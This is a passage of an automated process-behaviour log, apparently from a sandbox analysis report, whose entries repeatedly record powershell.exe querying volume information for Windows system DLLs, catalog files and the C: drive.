                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
